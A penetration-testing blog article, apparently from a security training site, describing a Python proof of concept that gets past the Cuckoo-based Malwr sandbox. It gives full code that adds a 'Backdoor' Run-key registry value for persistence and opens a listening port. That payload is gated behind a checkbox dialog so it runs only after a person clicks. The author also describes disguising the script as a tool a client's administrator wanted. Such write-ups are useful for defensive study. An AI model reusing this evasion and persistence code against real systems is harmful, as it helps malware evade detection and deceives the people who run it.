Penetration testing

Case Study: Evading Automated Sandbox - Python PoC

Hussam Khrais
June 3, 2015 by
Hussam Khrais

Introduction

With the increasing of Sandbox technology usage, every penetration tester should be prepared to face it one day. While a plenty of Pentest tools are out there, forging your own code can help you in this tough case where those tools fail.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Recently we've been doing a black box penetration testing for one of our clients where social engineering and client side attacks are allowed. During the information gathering phase, we suspected that they were using Sandbox technology along with signature based AV to protect a specific critical -obviously- part of the domain. Thankfully, our reconnaissance result turns out that one of the system admins was searching around in forums for free software to automate a certain task. The task was doable however, bypassing Sandbox analysis was my main concern. Let's see how useful that output was for us and take a closer look on the coding part!

In this article, I will share part of the code which I actually used to trick the Sandbox and gain the administrator trust to run the script. Please keep in mind that the actual script contained the task which the admin was seeking in the first place, otherwise it would raise her suspicions.

Approach

Below are some methods used by malware developers to detect and escape from Sandbox environment as documented by FireEye researchers:-

  • Human interaction—mouse clicks and dialog boxes.
  • Configuration-specific—sleep calls, time triggers, process hiding, malicious downloaders, execution name of the analyzed files, volume information, and execution after reboot.
  • Environment-specific—version, embedded iframes (in flash, swf, jpg files), embedded executable in an image file, and DLL loaders.
  • VMware-specific—system-service lists, unique files, and the VMX port.

In our scenario, using a human interaction method was the most suitable one. Since our victim was looking for a script that we will provide in the first place, it wouldn't hurt to add a simple check-box dialog to provide some options where the victim has to choose in order to proceed for code execution.

Action Plan

  1. Create a script that makes changes to the OS, such as opening a port and add a registry value.
  2. Submit it against online Sandbox analyzer, such as Malwr, which is based on open source Cuckoo.
  3. Add the evasion technique to our script.
  4. Test again and see the difference.

Phase 1, 2

One of the favorite things for a hacker is to add a registry key for persistence purpose. There must also be a way to communicate between the hacker and his victim. Let's write up a quick Python code to parse windows registry and add a string value, as well as open a TCP port.

[bash]

import _winreg as wreg

import socket

# part 1

key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, "SoftwareMicrosoftWindowsCurrentVersionRun",0, wreg.KEY_ALL_ACCESS)

wreg.SetValueEx(key, 'Backdoor', 0, wreg.REG_SZ,'C:bla.exe')

key.Close()

# part 2

s = socket.socket()

host = socket.gethostname()

port = 80

s.bind((host, port))

s.listen(5)

[/bash]

The code is quite simple, . in In the first part we opened a registry directory Software Microsoft Windows CurrentVersion Run then we added a string value called "Backdoor" as well as a data value pointing to an exe directory ('C:bla.exe')

The second part will just open a port 80 and listen for incoming connection on the port.

Next, I used Pyinstaller to export the script into exe format. I named the file Sandboxing.exe and submitted into Malwar website, in summary the analysis output could detect our actions as you can see below

-For the full analysis report, please see

https://malwr.com/analysis/ZjAxMDU1NzFmYWJhNGM1ODg0MTc1MjdiMWEzOTU4OTY/

Phase 3, 4

Now is the fun part. As I stated earlier, we need to create a check-box dialog window where the user must click, first, on one of the provided check-box list, then secondly on the continue button.

Important note: Cuckoo is intelligent enough to bypass a regular Messagebox trick. Therefore, in our code we forced the user to do a couple of actions, tick a check box then click on Continue button.

[bash]
from Tkinter import *

master = Tk()

def evasion():

def donothing(): # …………… 1

# Do nothin'
pass

master.protocol("WM_DELETE_WINDOW", donothing) # when X is clicked, do nothing

# …………… 2

Label(master, text=" Choose Your Editing Type: ").grid(row=0, sticky=W)

var1 = IntVar()

Checkbutton(master, text=" Online Editing ", variable=var1).grid(row=1, sticky=W)

var2 = IntVar()

Checkbutton(master, text=" Offline Editing ", variable=var2).grid(row=2, sticky=W)

# …………… 3

def quit():

if var1.get() == 1 or var2.get() ==1:

master.destroy()

Button(master, text='Continue', command=quit).grid(row=4, sticky=W, pady=4)
mainloop() # …………… 4

evasion()
[/bash]

I used a very popular Python library called Tkinter to do the GUI job for me, . first First we created an object called master, then under evasion function

(1)We disabled the "X" button.

(2)Creating a label text message with two check buttons – two trivial options are created here for "online" and "offline" editing.

(3)Create a continue Button, once clicked, it will destroy the dialog window if and only if one of the check boxes have been ticked first,first; we achieved this using the quit function.

(4)Keep in mind without destroying this window,window; our malicious code (opening a port and add a registry key) will not be executed.

The end result is something similar to

Wrapping up the complete code:-

[bash]
from Tkinter import *

master = Tk()

def evasion():

def donothing():

# Do nothin'
pass

master.protocol("WM_DELETE_WINDOW", donothing) # when X is clicked, do nothing

Label(master, text=" Choose Your Editing Type: ").grid(row=0, sticky=W)

var1 = IntVar()

Checkbutton(master, text=" Online Editing ", variable=var1).grid(row=1, sticky=W)

var2 = IntVar()

Checkbutton(master, text=" Offline Editing ", variable=var2).grid(row=2, sticky=W)

def quit():

if var1.get() == 1 or var2.get() ==1:

master.destroy()

Button(master, text='Continue', command=quit).grid(row=4, sticky=W, pady=4)
mainloop()

evasion()

import _winreg as wreg
import socket

key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, "SoftwareMicrosoftWindowsCurrentVersionRun",0, wreg.KEY_ALL_ACCESS)

wreg.SetValueEx(key, 'Backdoor', 0, wreg.REG_SZ,'C:bla.exe')

key.Close()

s = socket.socket()

host = socket.gethostname()

port = 80

s.bind((host, port))

s.listen(5)

[/bash]

Once again, exporting the script into exe, submitting into Malwr, but this time the result didn't mention anything on opening a port or a registry key.

For the full analysis report, please see

https://malwr.com/analysis/NGRlNjE5MWUzZGVlNDcyZmJjMTliYTM1MTczMTlmMDk/

However, if you run it under a live environment, you would see the final result as

Wonderful!!

Think out of the box

Based on the first analysis report, the Malwr binds an IP of 192.168.56.X to port 80, this subnet mask looks very family to VirtualBox users since it's exactly the same subnet used by VirtualBox host-only interface. Do you think that this info can help in bypassing VM environment? Please share your thoughts in the comment section.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

References

Hussam Khrais
Hussam Khrais

Hussam T. Khrais is a technical support engineer for a leading IT company in Jordan. He is predominantly focused on Network and Wireless Security. Beyond this, he’s interested in Python scripting and penetration testing. https://www.linkedin.com/pub/hussam-khrais/48/163/158